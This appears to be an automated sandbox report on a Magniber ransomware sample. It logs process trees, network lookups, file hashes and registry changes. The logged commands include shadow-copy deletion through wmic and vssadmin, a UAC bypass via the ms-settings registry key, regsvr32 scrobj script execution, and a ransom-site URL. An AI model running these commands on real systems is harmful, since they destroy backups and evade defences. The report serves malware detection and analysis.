PID 1112 wrote to memory of 2332 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\c752934305e1b89f82798ea2c26f70b3_JaffaCakes118.dll,#1

C:\Windows\notepad.exe

notepad.exe C:\Users\Public\readme.txt

C:\Windows\system32\cmd.exe

cmd /c "start http://f498ace85800dc40daditeiyb.topsaid.site/diteiyb^&2^&38246732^&93^&405^&12"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://f498ace85800dc40daditeiyb.topsaid.site/diteiyb&2&38246732&93&405&12

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2664 CREDAT:275457 /prefetch:2

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 f498ace85800dc40daditeiyb.topsaid.site udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\Pictures\readme.txt

MD5 cf6c0897802ebdb0a67c2fa5a478a570
SHA1 76a1374865972151672cc8be0bcb84d290a204bf
SHA256 1c706f882543ab94da63b6181500d7d8296ab241df4aca9a3c0750a9fe30f8aa
SHA512 c197446faa6005bb2bba2f5382703e408715d4b0929ccf93ea26f9716b9a21edb184c2353e0676b8c2bb87fba4c980499826195e6ed6b8ba7e398c1e05926a22

memory/2216-327-0x00000000020B0000-0x00000000021B0000-memory.dmp

memory/2216-328-0x00000000020B0000-0x00000000021B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab17A.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar258.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-05 10:45

Reported

2024-12-05 10:47

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

sihost.exe

Signatures

Detect magniber ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (72) files with added filename extension

ransomware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2196 set thread context of 2868 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\sihost.exe
PID 2196 set thread context of 2924 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 2196 set thread context of 2068 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\taskhostw.exe
PID 2196 set thread context of 3408 N/A C:\Windows\system32\rundll32.exe C:\Windows\Explorer.EXE
PID 2196 set thread context of 3544 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 2196 set thread context of 3740 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\DllHost.exe
PID 2196 set thread context of 3832 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
PID 2196 set thread context of 3896 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 2196 set thread context of 3988 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
PID 2196 set thread context of 4172 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 2196 set thread context of 3844 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
PID 2196 set thread context of 3696 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 2196 set thread context of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\backgroundTaskHost.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Windows\Explorer.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\taskhostw.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\DllHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\taskhostw.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\taskhostw.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\taskhostw.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A

Opens file in notepad (likely ransom note)

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskhostw.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
